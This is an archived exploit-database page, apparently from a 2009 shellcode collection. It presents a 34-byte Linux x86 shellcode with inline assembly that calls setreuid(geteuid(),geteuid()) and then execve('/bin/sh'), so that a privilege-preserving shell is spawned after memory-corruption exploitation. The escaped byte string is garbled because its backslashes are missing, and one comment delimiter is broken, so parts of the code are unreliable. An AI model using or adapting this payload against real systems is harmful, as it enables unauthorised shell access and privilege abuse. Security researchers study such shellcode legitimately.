linux/x86 setreuid(geteuid(),geteuid()),execve("/bin/sh",0,0) 34 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : linux/x86 setreuid(geteuid(),geteuid()),execve("/bin/sh",0,0) 34 bytes
# Published : 2009-06-16
# Author : blue9057
# Previous Title : solaris/x86 portbind/tcp shellcode generator
# Next Title : linux/x86 generate portbind payload

/*
 *
 * linux/x86 setreuid(geteuid(),geteuid()),execve("/bin/sh",0,0) 34byte universal shellcode
 *
 * blue9057 root@blue9057.com
 *
 * /
int main()
{
    char shellcode[]="x6ax31x58x99xcdx80x89xc3x89xc1x6ax46"
                              "x58xcdx80xb0x0bx52x68x6ex2fx73x68x68"
                              "x2fx2fx62x69x89xe3x89xd1xcdx80";
    //setreuid(geteuid(),geteuid());
    //execve("/bin/sh",0,0);
    __asm__(""
            "push $0x31;"
            "pop %eax;"
            "cltd;"
            "int $0x80;"        // geteuid();
            "mov %eax, %ebx;"
            "mov %eax, %ecx;"
            "push $0x46;"    // setreuid(geteuid(),geteuid());
            "pop %eax;"
            "int $0x80;"
            "mov $0xb, %al;"
            "push %edx;"
            "push $0x68732f6e;"
            "push $0x69622f2f;"
            "mov %esp, %ebx;"
            "mov %edx, %ecx;"
            "int $0x80;"        // execve("/bin/sh",0,0);
            "");
}

// www.Syue.com [2009-06-16]